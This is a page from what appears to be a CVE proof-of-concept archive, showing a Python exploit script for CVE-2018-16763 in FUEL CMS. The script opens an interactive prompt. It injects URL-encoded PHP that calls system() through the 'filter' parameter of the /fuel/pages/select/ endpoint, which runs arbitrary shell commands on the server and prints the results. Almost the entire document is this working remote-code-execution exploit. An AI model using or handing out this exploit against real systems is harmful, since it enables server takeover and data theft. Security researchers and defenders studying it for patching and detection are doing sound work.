4837 Total CVEs
26 Years
GitHub
Home / 2018 / CVE-2018-16763
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
import requests
import urllib
 
url = "http://127.0.0.1:8881"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start
 
while 1:
    xxxx = raw_input('cmd:')
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    proxy = {"http":"http://127.0.0.1:8080"}
    r = requests.get(burp0_url, proxies=proxy)
 
    html = ""
    htmlcharset = r.text.find(html)
 
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)
 
    print r.text[0:dup]